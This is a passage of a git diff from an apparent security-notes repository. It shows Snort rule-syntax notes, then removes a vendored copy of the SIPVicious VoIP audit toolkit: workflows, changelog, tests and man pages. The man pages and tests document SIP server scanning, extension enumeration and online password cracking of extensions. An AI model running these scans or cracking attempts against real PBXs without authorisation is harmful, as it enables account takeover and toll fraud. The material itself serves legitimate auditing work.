* Log files can be opened by wireshark or `tcpdump -r <logfile>`
| Parameter | Description |
|-----------|-------------|
| -l | Logger mode, target log and alert output directory. Default output folder is tcpdump to /var/log/snort.|
| -K ASCII | Log packets in ASCII format |
| -r | Filter dumped logs in Snort |
| -n | Specify the number of packets that will be read |
### IDS and IPS
* Output is an alert file along an optional log file
| Parameter | Description |
|-----------|-------------|
| -c | Defining the configuration file |
| -T | Testing the configuration file |
| -N | Disable logging |
| -D | Background mode |
| -A | Alert modes; __full__: all possible info about alerts, default mode; __fast__ : alert message, timestamp, source and destination IP, port numbers. __console__: Provides fast style alerts on the console screen. __cmg__: CMG style, basic header details with payload in hex and text format. __none__: Disabling alerting |
* Rules found in `/etc/snort/rules/local.rules`
```sh
alert icmp any any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
```
### PCAPs
* `snort -c <configfile> -r file.pcap -A console -n <number of packets>`
* `snort -c <configfile> --pcap-list="file1.pcap file2.pcap" -A console -l .`
## Rules
```sh
snort -c /etc/snort/rules/local.rules -A console
snort -c /etc/snort/rules/local.rules -A full
```
* Every rule has an IP source and destination, as well as a port for every endpoint
* General, payload and non payload rules
* Direction of the packet
* `->` to destination
* `<>` bidirectional
* IDS -> `alert`
* IPS -> `reject`
```sh
<action> <protocol> <ip.src> <src.port> <> <ip.dst> <dst.port>(msg: "<msg>; <reference>; <ruleID>;<revision info>
```
* Actions
* `alert`
* `log`
* `drop`
* `reject`
* SID rule IDs
* < 100 reserved rules
* 100 - 999,999 rules of the build
* >= 1,000,000 user rules
* Reference may be a CVE
* Revisions are versionings of the rule
* Filter address range via CIDR
```sh
alert icmp 192.168.1.0/24 any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
```
* Filter multiple address ranges
```sh
alert icmp [192.168.1.0/24, 10.1.1.0/24] any <> any any (msg: "ICMP Packet Found"; sid: 100001; rev:1;)
```
* Exlude via `!10.10.0.1`
* Filter via any and ports between 4712 and 8080
```sh
alert icmp any 4711,8080: <> any any (msg: "TCP Packet Found"; sid: 100001; rev:1;)
```
### Detection Rules
* `/etc/snort/rules/local.rules`
* ASCII or gex mode
```sh
ASCII mode - alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET";content: "/foo"; sid: 100001; rev:1;)
alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"|47 45 54|"; sid: 100001; rev:1;)
```
* Case insensitiv
```sh
alert tcp any any -> any 8080 (msg: "GET Request Found"; content:"GET"; nocase; sid: 100001; rev:1;)
```
* Fast pattern
```sh
alert tcp any any <> any 80 (msg: "GET Request Found"; content:"GET"; fast_pattern; content:"www"; sid:100001; rev:1;)
```
* Non payload detection rules
* TCP flags, `flags: F,S,A,R,P,U`
* Payload size, `dsize:min<>max`
* SameIP, `alert ip any any <> any any (msg: "SAME-IP TEST"; sameip; sid: 100001; rev:1;)`
* Packet IDs, `id: 4711`

1
misc/static-binaries

@ -1 +0,0 @@
Subproject commit 0be803093b7d4b627b4d4eddd732e54ac4184b67

7
misc/telecommunications/sipvicious.md
View File

@ -1,7 +0,0 @@
# Sipvicious
* [Enable Security](https://github.com/EnableSecurity/sipvicious.git)
# Enumeration
* Check which PBX is used via `svmap $TARGET_IP`
* Use `msf6 auxiliary(voip/asterisk_login)`

37
misc/telecommunications/sipvicious/.github/ISSUE_TEMPLATE/bug-report.md vendored
View File

@ -1,37 +0,0 @@
---
name: Bug report
about: Report bugs to us
title: ''
labels: bug
assignees: ''
---
<!--- Provide a general summary of the issue in the Title above -->
### Expected behavior
<!--- Tell us what should happen -->
XXX
### Actual behavior
<!--- Tell us what happens instead of the expected behavior -->
XXX
### Steps to reproduce the behavior
<!-- An unambiguous set of steps to reproduce this bug. Include code to reproduce or logs, if relevant -->
Command run:
```
sipvicious_svwar [params]
```
1. xxx
2. xxx
### Possible Solution
<!--- Not obligatory, but suggest a fix/reason for the bug, -->
XXX

10
misc/telecommunications/sipvicious/.github/ISSUE_TEMPLATE/custom.md vendored
View File

@ -1,10 +0,0 @@
---
name: Custom issue template
about: Describe this issue template's purpose here.
title: ''
labels: ''
assignees: ''
---

43
misc/telecommunications/sipvicious/.github/workflows/auto-test.yml vendored
View File

@ -1,43 +0,0 @@
name: Automatic +ve/-ve Testing
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
workflow_dispatch:
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Set up Python 3.9
uses: actions/setup-python@v2
with:
python-version: 3.9
- name: Install the package
run: |
python setup.py install
- name: svwar tests
run: |
pushd autotest
./svwar.sh
popd
- name: svcrack tests
run: |
pushd autotest
./svcrack.sh
popd
- name: svmap tests
run: |
pushd autotest
./svmap.sh
popd

36
misc/telecommunications/sipvicious/.github/workflows/python-app.yml vendored
View File

@ -1,36 +0,0 @@
# This workflow will install Python dependencies, run tests and lint with a single version of Python
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
name: Python application
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
build:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Set up Python 3.9
uses: actions/setup-python@v2
with:
python-version: 3.9
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install flake8 pytest
if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
- name: Lint with flake8
run: |
# stop the build if there are Python syntax errors or undefined names
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
# - name: Test with pytest
# run: |
# pytest

39
misc/telecommunications/sipvicious/.github/workflows/python-package.yml vendored
View File

@ -1,39 +0,0 @@
# This workflow will install Python dependencies, run tests and lint with a variety of Python versions
# For more information see: https://help.github.com/actions/language-and-framework-guides/using-python-with-github-actions
name: Python package
on:
push:
branches: [ master ]
pull_request:
branches: [ master ]
jobs:
build:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: [3.7, 3.8, 3.9]
steps:
- uses: actions/checkout@v2
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v2
with:
python-version: ${{ matrix.python-version }}
- name: Install dependencies
run: |
python -m pip install --upgrade pip
python -m pip install flake8 pytest
if [ -f requirements.txt ]; then pip install -r requirements.txt; fi
- name: Lint with flake8
run: |
# stop the build if there are Python syntax errors or undefined names
flake8 . --count --select=E9,F63,F7,F82 --show-source --statistics
# exit-zero treats all errors as warnings. The GitHub editor is 127 chars wide
flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics
# - name: Test with pytest
# run: |
# pytest

33
misc/telecommunications/sipvicious/.github/workflows/python-publish.yml vendored
View File

@ -1,33 +0,0 @@
# This workflow will upload a Python Package using Twine when a release is created
# For more information see: https://help.github.com/en/actions/language-and-framework-guides/using-python-with-github-actions#publishing-to-package-registries
name: Upload Python Package
on:
release:
types: [published]
workflow_dispatch:
jobs:
deploy:
runs-on: ubuntu-latest
steps:
- uses: actions/checkout@v2
- name: Set up Python
uses: actions/setup-python@v2
with:
python-version: '3.x'
- name: Install dependencies
run: |
python -m pip install --upgrade pip
pip install setuptools wheel twine
- name: Build and publish
env:
TWINE_USERNAME: ${{ secrets.PYPI_USERNAME }}
TWINE_PASSWORD: ${{ secrets.PYPI_PASSWORD }}
run: |
python setup.py sdist bdist_wheel
twine upload dist/*

18
misc/telecommunications/sipvicious/.gitignore vendored
View File

@ -1,18 +0,0 @@
# syntax: glob
bin
build
dist
include
lib
__pycache__
distribute.egg-info
setuptools.egg-info
.coverage
.tox
*.egg
*.py[cod]
*.swp
*~
.hg*
.vscode/*
sipvicious.egg-info

192
misc/telecommunications/sipvicious/Changelog
View File

@ -1,192 +0,0 @@
v0.3.4 (20210601)
* Feature: Exit codes implementation
* Automated positive/negative testing with GitHub Actions
* Code refactoring
v0.3.3 (20210325)
* Feature: Input via STDIN for svcrack and svwar
* Feature: Full URL format support for svwar and svcrack
* Code refactoring
v0.3.2 (20210303)
* Feature: IPv6 support to svmap
* Bug fix: auth header exception handling
* Bug fix: relative import error fixes
* github issue templates for proper structured issue reporting
* supplementary bug fixes as and when reported
v0.3.0 (20200129)
* Port to Python 3! thanks to 0xInfection
* IPv6 support for svwar and svcrack
* svcrack now takes the --method option too
* qop and md5-sess auth support added
* lots of bug fixes
v0.2.8 (20121210)
* Feature: INVITE sends a BYE and supports ACK
* Feature: man pages can be produced with --manpage and man pages are included
* Bug fix: removed fingerprinting completely
* Change: moved pptable.py and svhelper to libs/
* Change: Number of changes to adhere to Debian's guidelines (copyright/license notices etc)
* Bug fix: fixed an svcrack unhandled exception
v0.2.7 (20120222)
* Feature: svcrash.py has a new option -b which bruteforces the attacker's port
* Feature: svcrack.py now tries the extension as password by default, automatically
* Feature: svcrack.py and svwar.py now support setting of source port
* Feature: new parameter --domain can be passed to all tools which specifies
a custom domain in the SIP uri instead of the destination IP
* Feature: new --debug switch which shows the messages received
* Bug fix: Sometimes nonces could not be extracted due to an incorrect regex
* Bug fix: Fixed an unhandled exception when decoding tags
* Bug fix: now using hashlib when available instead of md5
* Bug fix: removed the space after the SIP address in the From header which
led to newer version of Asterisk to ignore the SIP messages
* Bug fix: dictionaries with new lines made svcrack.py stop without this fix
* Change: renamed everything to start with sv*
* Bug fix: changed the way shelved files are opened by the fingerprinting module
* Change: fingerprinting disabled by default since it was giving too many problems
and very little benefits
v0.2.6 (20100621)
* Feature: svcrash.py is a new tool for sending messages that crash svwar and
svcrack
* Bug fix: helper.py has been fixed when decoding the tags (svcrash abuses
this issue)
v0.2.5 (20100519)
* Feature: svwar.py has "scan for default / typical extensions" option. This
option tries to guess numeric extensions which have certain patterns
such as 1212 etc. Option is -D, --enabledefaults
* General: svwar.py and svcrack.py now have a new option which allows you to set
how long the tools will scan without receiving any response back.
This allows us to prevent flooding the target. Some PBX servers now
have built-in firewalls / intrusion prevention systems which will
blacklist the IP address of anyone using svwar or svcrack. Therefore
if the IP is blacklisted it makes sense to stop scanning the target.
The default for this option is 10 seconds. Set this option by using
--maximumtime [seconds]
* Removed: svlearnfp.py is now discontinued. The tool is still included for
historic reasons but disabled.
* Feature: svmap.py now includes the following new features:
--debug - shows messages as they are received (useful for
developers)
--first - scans the first X number of hosts, useful for
random or large address pool scanning
--inputtext - scans IP ranges taken from a text file
--fromname - sets the from header to something specific
useful for abusing other security issues or
when svmap is used in a more flexible way
then usual ;-)
* Feature: svreport.py now has two new modes:
- stats, which lists some statistics
- search, allows you to search through logs looking for
specific user agents
* Bug fix: svwar.py now by default does not send ACK messages (was a buggy feature
that did not follow the standard)
* Bug fix: svwar.py - the template passed through --template option is now checked
sanity.
v0.2.4
* Feature: svwar.py can now scan for templated numbers. This allows more flexible
usage of ranges of numbers, allowing for prefixes and suffixes as
need be ;-)
* Bug fix: svwar.py now sends ACK to be nice to other devices.
* Bug fix: each tag is padded with a unique 32 bit
* Bug fix: Contact header is always added to the request to always send well
formed SIP requests
* Bug fix: Large data is sent fragmented now (mysendto)
* Bug fix: svwar.py now handles new SIP response codes
v0.2.3
* Feature: Fingerprinting support for svmap. Included fphelper.py and
3 databases used for fingerprinting.
* Feature: Added svlearnfp.py which allows one to add new signatures to
db and send them to the author.
* Feature: Added DNS SRV check to svmap. Use ./svmap.py --srv domainname.com
to give it a try
v0.2.svn
* Feature: added the ability for svreport to count results when doing a list
* Bug fix: fixed a bug related to resuming a scan which does not have an
an extension
v0.2.1 (maintenance)
General:
* Feature: updated the report function to include more information about
the system. Python version and operating system is now included
in the bug report. option now supports optional feedback.
* Feature: Store information about the state of a session. Sessions can be
complete or incomplete, so that you can resume incomplete sessions
but not complete ones.
* Feature: Added -e option to svmap. Allows you to specify an extension. This
is useful when using -m INVITE options on a SIP phone.
* Bug fix: Added a check to make sure that the python version is supported.
Anything less than version 2.4 is not supported
* Bug fix: IP in the SIP msg was being set to localhost when not explicitly
set. This is not correct behavior and was fixed. As a result of this
behavior some devices, such as Grandstream BT100 were not being detected.
Thanks to robert&someone from bulgaria for reporting this
* Bug fix: fixed a bug in the database which was reported anonymously via the --reportback / -R option.
Thanks whoever reported that. Bug concerns the dbm which does not
support certain methods supported other database modules referenced
by anydbm. Reproduced on FreeBSD. Thanks to Anthony Williams for help i
dentifying this
* Bug fix: Ranges of extensions in svwar could not take long numeric extensions
(xrange does not support long / large numbers). Thanks to Joern for reporting this
* Bug fix: svwar was truncating extension names containing certain characters. Fixed.
* Bug fix: when binding to a specific interface, the IP within the SIP message could be incorrect (when there are multiple interfaces). This has been fixed.
* Cosmetic: Certain PBXs reply with "603 Declined" when svwar finds that the
extension does not exist. This creates extra noise. It is now being
suppressed.
v0.2
General:
* Feature: replaced 3rd party functions in ip4range with our functions in helper.py
* Feature: ReportBack function is off by default but can be enabled by using -R option
* Feature: verbose and quiet mode. Now making use of logging module
* Newtool: svreport - export to csv, pdf, xml and plain text.
* Feature: session / database support. This allows two things:
- resuming of previous scans
- exporting the results to more meaningful formats
* Feature: give a warning when the default port is already being used and listen on another port
Svmap:
* Feature: Host arguments now accepts a variety of formats. You can now scan using ranges like the following:
- 1.1.1.1-20 1.1.1-20.1-10
- 1.1.1.*
- 1.1.1.1-1.1.2.20
- sipvicious.org/22
* Bug fix: Generation of hosts to scan is now dynamic and does not slow down startup time
* Feature: Now making use of the standard logging module with more logging to debug problems
* Feature: When the port is already bound, svmap tries to listen on another port
* Feature: Added options to allow you to specify the ip to bind to as well as the external ip address of the scanner
* Feature: --help now shows proper usage
* Feature: New scanning method - random scan! This scans only valid internet address space.
* Feature: Randomize scan. Allows you to randomize the order of the IP addresses to be scanned.
Svwar:
* Bug fix: Svwar was missing valid extensions (false negatives) - fixed
* Bug fix: Logic bug which did not identify between a server that does not respond and one that sends an unexpected response.
* Bug fix: Fixed description of errors and usage
Svcrack:
* General: --help output was updated to match the other tools.
Svreport:
* General: was born. Allows managing of saved sessions and exporting to different file formats.
* Feature: Reverse name lookup for ip addresses
v0.1
First release.

16
misc/telecommunications/sipvicious/LICENSE
View File

@ -1,16 +0,0 @@
SIPVicious OSS is a set of security tools to audit SIP based VoIP systems.
Copyright (C) 2007-2020 Sandro Gauci <sandro@enablesecurity.com>
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.

2
misc/telecommunications/sipvicious/MANIFEST.in
View File

@ -1,2 +0,0 @@
include LICENSE
include Changelog README.md THANKS TODO

77
misc/telecommunications/sipvicious/README.md
View File

@ -1,77 +0,0 @@
# Welcome to SIPVicious OSS security tools
![SIPVicious mascot](https://repository-images.githubusercontent.com/32133566/55b41300-12d9-11eb-89d8-58f60930e3fa)
SIPVicious OSS is a set of security tools that can be used to audit SIP based VoIP systems. Specifically, it allows you to find SIP servers, enumerate SIP extensions and finally, crack their password.
To get started read the following:
- [Getting started on the Wiki](https://github.com/enablesecurity/sipvicious/wiki/Getting-Started)
- Communication Breakdown blog: [Attacking a real VoIP System with SIPVicious OSS](https://www.rtcsec.com/2020/06/02-attacking-voip-system-with-sipvicious/).
For usage help make use of `-h` or `--help` switch.
## A note to vendors and service providers
If you are looking for a professional grade toolset to test your RTC systems, please consider [SIPVicious PRO](https://www.sipvicious.pro).
## The tools
The SIPVicious OSS toolset consists of the following tools:
- svmap
- svwar
- svcrack
- svreport
- svcrash
### svmap
this is a sip scanner. When launched against
ranges of ip address space, it will identify any SIP servers
which it finds on the way. Also has the option to scan hosts
on ranges of ports.
Usage: <https://github.com/EnableSecurity/sipvicious/wiki/SVMap-Usage>
### svwar
identifies working extension lines on a PBX. A working
extension is one that can be registered.
Also tells you if the extension line requires authentication or not.
Usage: <https://github.com/EnableSecurity/sipvicious/wiki/SVWar-Usage>
### svcrack
a password cracker making use of digest authentication.
It is able to crack passwords on both registrar servers and proxy
servers. Current cracking modes are either numeric ranges or
words from dictionary files.
Usage: <https://github.com/EnableSecurity/sipvicious/wiki/SVCrack-Usage>
### svreport
able to manage sessions created by the rest of the tools
and export to pdf, xml, csv and plain text.
Usage: <https://github.com/EnableSecurity/sipvicious/wiki/SVReport-Usage>
### svcrash
responds to svwar and svcrack SIP messages with a message that
causes old versions to crash.
Usage: <https://github.com/EnableSecurity/sipvicious/wiki/SVCrash-FAQ>
## Installation
Please refer to the [installation documentation](https://github.com/EnableSecurity/sipvicious/wiki/Basics#installation).
## Further information
Check out the [wiki](https://github.com/enablesecurity/sipvicious/wiki) for documentation.

13
misc/telecommunications/sipvicious/THANKS
View File

@ -1,13 +0,0 @@
Thanks for all the support go to ...
- Anthony Williams - ironguard.net
- Chase Pollock
- Chris Vella - the gozo
- Joseph McCray - learnsecurityonline.com
- Joern - Recurity Labs
- Robert Abela - http://www.voipproducts.org/
- Brian Azzopardi
- Teodor Georgiev - http://web1.egvrn.net/tokata
- Yori Kvitchko
- Victor Seva <linuxmaniac@torreviejawireless.org>
- You?

2
misc/telecommunications/sipvicious/TODO
View File

@ -1,2 +0,0 @@
Consult the wiki page please:
https://github.com/EnableSecurity/sipvicious/wiki/TodoList

5
misc/telecommunications/sipvicious/autotest/common.sh
View File

@ -1,5 +0,0 @@
do_test() {
$2
if [ $? -ne $1 ]; then exit 1; fi
}

35
misc/telecommunications/sipvicious/autotest/svcrack.sh
View File

@ -1,35 +0,0 @@
#!/bin/bash
set -xu
source common.sh
# no -u supplied
do_test 10 "sipvicious_svcrack nouser-syntaxerr"
# invalid hostname syntax
do_test 10 "sipvicious_svcrack udp://pew.pew"
# again invalid syntax
do_test 10 "sipvicious_svcrack pew.pew:5060"
# multiple hosts (svcrack doesn't support it rn)
do_test 10 "sipvicious_svcrack pew.pew:5060 ws://pew.pew:5060"
# negative maximumtime
do_test 10 "sipvicious_svcrack demo.sipvicious.pro --maximumtime -1"
# just the scheme with no URL (technically a valid URL)
do_test 10 "sipvicious_svcrack test://"
# non existent host
do_test 30 "sipvicious_svcrack 1.2.3.4 -u 100"
# invalid port on host
do_test 30 "sipvicious_svcrack demo.sipvicious.pro -p 8888 -u 100"
# valid user & hostname but wrong range
do_test 0 "sipvicious_svcrack demo.sipvicious.pro -u 1000 -r 100-200"
# valid user & hostname with valid range
do_test 40 "sipvicious_svcrack demo.sipvicious.pro -u 1000 -r 1400-1600"
# non-existent dictionary file
do_test 20 "sipvicious_svcrack demo.sipvicious.pro -d test.txt -u 1000"
# valif dictionary file
echo 1500 > test2.txt
do_test 40 "sipvicious_svcrack udp://demo.sipvicious.pro:5060 -d test2.txt -u 1000"
rm test2.txt
# enabling defaults
do_test 40 "sipvicious_svcrack demo.sipvicious.pro -D -u 1000"
# replicating host down, i.e. we're not getting packets back
do_test 30 "sipvicious_svcrack udp://demo.sipvicious.pro:5060 -u 1000 --maximumtime 0"

42
misc/telecommunications/sipvicious/autotest/svmap.sh
View File

@ -1,42 +0,0 @@
#!/bin/bash
set -xu
source common.sh
# invalid ip format
do_test 10 "sipvicious_svmap 1.1..1"
# invalid host
do_test 30 "sipvicious_svmap wronghost"
# valid ip but not a sip talking host
do_test 30 "sipvicious_svmap 1.2.3.4"
# valid host but wrong port
do_test 30 "sipvicious_svmap demo.sipvicious.pro -p 8888"
# valid host w/ wrong port range
do_test 30 "sipvicious_svmap demo.sipvicious.pro -p 8000-9000"
# valid host w/ default port
do_test 0 "sipvicious_svmap demo.sipvicious.pro"
# valid ip w/ default port
do_test 0 "sipvicious_svmap 172.104.142.43" # demo.sipvicious.pro; this might change
# valid ip w/ different ports
do_test 30 "sipvicious_svmap demo.sipvicious.pro -p 5060,8888"
# ipv6 hosts
do_test 30 "sipvicious_svmap -6 ::1"
do_test 30 "sipvicious_svmap -6 ::"
# commented out, GitHub actions does not appear to support ipv6
# do_test 0 "sipvicious_svmap -6 2a01:7e01::f03c:92ff:fecf:60a8" # demo.sipvicious.pro; this might change
# ip ranges & cidr ranges
do_test 30 "sipvicious_svmap 10.0.0.1-2 172.16.131.1 demo.sipvicious.pro/32 10.0.0.*"
# controlling packet rate + different method name + randomize
do_test 30 "sipvicious_svmap 10.0.0.0/30 -t 3 -m INVITE --randomize"
# ping a specific extension
do_test 0 "sipvicious_svmap demo.sipvicious.pro -e 1000"
# non-existent file
do_test 20 "sipvicious_svmap -I nonexistent.txt"
# IPs from file testing
echo -e '1.1.1.1\n172.104.142.43' >> test.txt
do_test 30 "sipvicious_svmap -I test.txt"
rm test.txt
# scan first few IPs
do_test 30 "sipvicious_svmap 10.0.0.0/8 --first 2"
# compact mode
do_test 0 "sipvicious_svmap demo.sipvicious.pro -c"

29
misc/telecommunications/sipvicious/autotest/svwar.sh
View File

@ -1,29 +0,0 @@
#!/bin/bash
set -xu
source common.sh
# invalid host
do_test 30 "sipvicious_svwar wronghost"
# valid host not talking SIP
do_test 30 "sipvicious_svwar 1.2.3.4"
# valid host but wrong port
do_test 30 "sipvicious_svwar demo.sipvicious.pro -p 8888"
# valid url format but wrong extension range
do_test 0 "sipvicious_svwar udp://demo.sipvicious.pro:5060 -e 100-200"
# valid host & valid extension range
do_test 40 "sipvicious_svwar demo.sipvicious.pro -e 1000-1200"
# valid url format with extension range
do_test 40 "sipvicious_svwar udp://demo.sipvicious.pro:5060 -e 1000-1200"
# valid url format but wrong port w/ valid extension range
do_test 30 "sipvicious_svwar udp://demo.sipvicious.pro:8888 -e 1000-1200"
# non existent input dictionary files
do_test 20 "sipvicious_svwar -d test.txt demo.sipvicious.pro"
# valid dictionary file for extensions
echo 1100 > test2.txt
do_test 40 "sipvicious_svwar -d test2.txt demo.sipvicious.pro"
rm test2.txt
# enable defaults mode
do_test 40 "sipvicious_svwar udp://demo.sipvicious.pro:5060 -D -m OPTIONS"
# compact mode + packet rate
do_test 40 "sipvicious_svwar demo.sipvicious.pro -e 1000-1005 -c -t 2"

135
misc/telecommunications/sipvicious/man1/svcrack.1
View File

@ -1,135 +0,0 @@
.TH SVCRACK.PY "1" "June 2020" "svcrack.py v0.3.4" "User Commands"
.SH NAME
svcrack.py \- manual page for svcrack.py v0.3.4
.SH SYNOPSIS
.B svcrack.py
\fI-u username \fR[\fIoptions\fR] \fItarget\fR
.SH DESCRIPTION
examples:
svcrack.py \fB\-u100\fR \fB\-d\fR dictionary.txt udp://10.0.0.1:5080
svcrack.py \fB\-u100\fR \fB\-r1\-9999\fR \fB\-z4\fR 10.0.0.1
.SH OPTIONS
.TP
\fB\-\-version\fR
show program's version number and exit
.TP
\fB\-h\fR, \fB\-\-help\fR
show this help message and exit
.TP
\fB\-v\fR, \fB\-\-verbose\fR
Increase verbosity
.TP
\fB\-q\fR, \fB\-\-quiet\fR
Quiet mode
.TP
\fB\-p\fR PORT, \fB\-\-port\fR=\fIPORT\fR
Destination port or port ranges of the SIP device \- eg
\fB\-p5060\fR,5061,8000\-8100
.TP
\fB\-P\fR PORT, \fB\-\-localport\fR=\fIPORT\fR
Source port for our packets
.TP
\fB\-x\fR IP, \fB\-\-externalip\fR=\fIIP\fR
IP Address to use as the external ip. Specify this if
you have multiple interfaces or if you are behind NAT
.TP
\fB\-b\fR BINDINGIP, \fB\-\-bindingip\fR=\fIBINDINGIP\fR
By default we bind to all interfaces. This option
overrides that and binds to the specified ip address
.TP
\fB\-t\fR SELECTTIME, \fB\-\-timeout\fR=\fISELECTTIME\fR
This option allows you to trottle the speed at which
packets are sent. Change this if you're losing
packets. For example try 0.5.
.TP
\fB\-R\fR, \fB\-\-reportback\fR
Send the author an exception traceback. Currently
sends the command line parameters and the traceback
.TP
\fB\-A\fR, \fB\-\-autogetip\fR
Automatically get the current IP address. This is
useful when you are not getting any responses back due
to SIPVicious not resolving your local IP.
.TP
\fB\-s\fR NAME, \fB\-\-save\fR=\fINAME\fR
save the session. Has the benefit of allowing you to
resume a previous scan and allows you to export scans
.TP
\fB\-\-resume\fR=\fINAME\fR
resume a previous scan
.TP
\fB\-c\fR, \fB\-\-enablecompact\fR
enable compact mode. Makes packets smaller but
possibly less compatible
.TP
\fB\-u\fR USERNAME, \fB\-\-username\fR=\fIUSERNAME\fR
username to try crack
.TP
\fB\-d\fR DICTIONARY, \fB\-\-dictionary\fR=\fIDICTIONARY\fR
specify a dictionary file with passwords or - for stdin
.TP
\fB\-r\fR RANGE, \fB\-\-range\fR=\fIRANGE\fR
specify a range of numbers. example:
100\-200,300\-310,400
.TP
\fB\-e\fR EXTENSION, \fB\-\-extension\fR=\fIEXTENSION\fR
Extension to crack. Only specify this when the
extension is different from the username.
.TP
\fB\-z\fR PADDING, \fB\-\-zeropadding\fR=\fIPADDING\fR
the number of zeros used to padd the password.
the options "\-r 1\-9999 \fB\-z\fR 4" would give 0001 0002 0003
\&... 9999
.TP
\fB\-n\fR, \fB\-\-reusenonce\fR
Reuse nonce. Some SIP devices don't mind you reusing
the nonce (making them vulnerable to replay attacks).
Speeds up the cracking.
.TP
\fB\-T\fR TEMPLATE, \fB\-\-template\fR=\fITEMPLATE\fR
A format string which allows us to specify a template
for the extensions example
svwar.py \fB\-e\fR 1\-999 \fB\-\-template=\fR"123%#04i999" would scan
between 1230001999 to 1230999999"
.TP
\fB\-\-maximumtime\fR=\fIMAXIMUMTIME\fR
Maximum time in seconds to keep sending requests
without receiving a response
back
.TP
\fB\-D\fR, \fB\-\-enabledefaults\fR
Scan for default / typical passwords such as
1000,2000,3000 ... 1100, etc. This option is off by
default. Use \fB\-\-enabledefaults\fR to
enable this functionality
.TP
\fB\-\-domain\fR=\fIDOMAIN\fR
force a specific domain name for the SIP message, eg.
\fB\-d\fR example.org
.TP
\fB\-\-requesturi\fR=\fIREQUESTURI\fR
Force the first line URI to a specific value; e.g. sip:999@example.org
.TP
\fB\-6\fR
Scan an IPv6 address
.IP
SIPvicious password cracker is an online password guessing tool for SIP devices.
Copyright (C) 2021 Sandro Gauci <sandro@enablesecurity.com>
.IP
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
.IP
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.IP
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
.SH "SEE ALSO"
The full documentation for
.B svcrack.py
can be found on GitHub at <https://github.com/enablesecurity/sipvicious/wiki>.

49
misc/telecommunications/sipvicious/man1/svcrash.1
View File

@ -1,49 +0,0 @@
.TH SVCRASH.PY "1" "June 2020" "svcrash.py v0.3.4" "User Commands"
.SH NAME
svcrash.py \- manual page for svcrash.py v0.3.4
.SH SYNOPSIS
.B svcrash.py
[\fIoptions\fR]
.SH OPTIONS
.TP
\fB\-\-version\fR
show program's version number and exit
.TP
\fB\-h\fR, \fB\-\-help\fR
show this help message and exit
.TP
\fB\-\-auto\fR
Automatically send responses to attacks
.TP
\fB\-\-astlog\fR=\fIASTLOG\fR
Path for the asterisk full logfile
.TP
\fB\-d\fR IPADDR
specify attacker's ip address
.TP
\fB\-p\fR PORT
specify attacker's port
.TP
\fB\-b\fR
bruteforce the attacker's port
.IP
Sipvicious crash exploits a bug in svwar/svcrack.py to stop unauthorized scans from flooding the network.
Copyright (C) 2021 Sandro Gauci <sandro@enablesecurity.com>
.IP
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
.IP
This program is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
.IP
You should have received a copy of the GNU General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
.SH "SEE ALSO"
The full documentation for
.B svcrash.py
can be found on GitHub at <https://github.com/enablesecurity/sipvicious/wiki>.

140
misc/telecommunications/sipvicious/man1/svmap.1
View File

@ -1,140 +0,0 @@
.TH SVMAP.PY "1" "June 2020" "svmap.py v0.3.4" "User Commands"
.SH NAME
svmap.py \- manual page for svmap.py v0.3.4
.SH SYNOPSIS
.B svmap.py
[\fIoptions\fR] \fIhost1 host2 hostrange\fR
.SH DESCRIPTION
Scans for SIP devices on a given network
.PP
examples:
.PP
svmap.py 10.0.0.1\-10.0.0.255 172.16.131.1 sipvicious.org/22 10.0.1.1/241.1.1.1\-20 1.1.2\-20.* 4.1.*.*
.PP
svmap.py \fB\-s\fR session1 \fB\-\-randomize\fR 10.0.0.1/8
.PP
svmap.py \fB\-\-resume\fR session1 \fB\-v\fR
.PP
svmap.py \fB\-p5060\-5062\fR 10.0.0.3\-20 \fB\-m\fR INVITE
.PP
.SH OPTIONS
.TP
\fB\-\-version\fR
show program's version number and exit
.TP
\fB\-h\fR, \fB\-\-help\fR
show this help message and exit
.TP
\fB\-v\fR, \fB\-\-verbose\fR
Increase verbosity
.TP
\fB\-q\fR, \fB\-\-quiet\fR
Quiet mode
.TP
\fB\-p\fR PORT, \fB\-\-port\fR=\fIPORT\fR
Destination port or port ranges of the SIP device \- eg
\fB\-p5060\fR,5061,8000\-8100
.TP
\fB\-P\fR PORT, \fB\-\-localport\fR=\fIPORT\fR
Source port for our packets
.TP
\fB\-x\fR IP, \fB\-\-externalip\fR=\fIIP\fR
IP Address to use as the external ip. Specify this if
you have multiple interfaces or if you are behind NAT
.TP
\fB\-b\fR BINDINGIP, \fB\-\-bindingip\fR=\fIBINDINGIP\fR
